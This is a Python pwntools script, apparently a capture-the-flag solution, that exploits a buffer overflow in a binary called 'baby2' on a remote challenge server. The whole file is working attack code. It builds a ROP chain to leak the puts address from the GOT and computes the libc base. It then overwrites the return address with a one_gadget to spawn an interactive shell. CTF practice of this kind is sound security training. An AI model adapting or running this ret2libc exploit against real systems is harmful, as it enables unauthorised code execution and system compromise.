```python
from pwn import *

#r = process('./baby2')
r = remote('baby-01.pwn.beer', 10002)
e = ELF('./baby2')
libc = ELF('./libc.so.6')

ru = lambda a: r.recvuntil(a)
sl = lambda a: r.sendline(a)
sla = lambda a, b: r.sendlineafter(a, b)
ex = lambda : r.interactive()

puts_offset = libc.symbols['puts']
puts_plt = e.plt['puts']
puts_got = e.got['puts']
main = e.symbols['main']
pr = 0x0000000000400783 # pop rdi; ret
binsh_offset = libc.search('/bin/sh').next()
system_offset = libc.symbols['system']
one_gadget = 0x4f2c5

p = ""
p += "\x90"*0x18
p += p64(pr)
p += p64(puts_got)
p += p64(puts_plt)
p += p64(main)
sl(p)

ru("input: ")
leaked = u64(r.recv(6).ljust(8, '\x00'))
print hex(leaked)
libc_base = leaked - puts_offset
one_shot = libc_base + one_gadget

p = ""
p += "\x90"*0x18
p += p64(one_shot)
sla('input: ', p)
ex()
```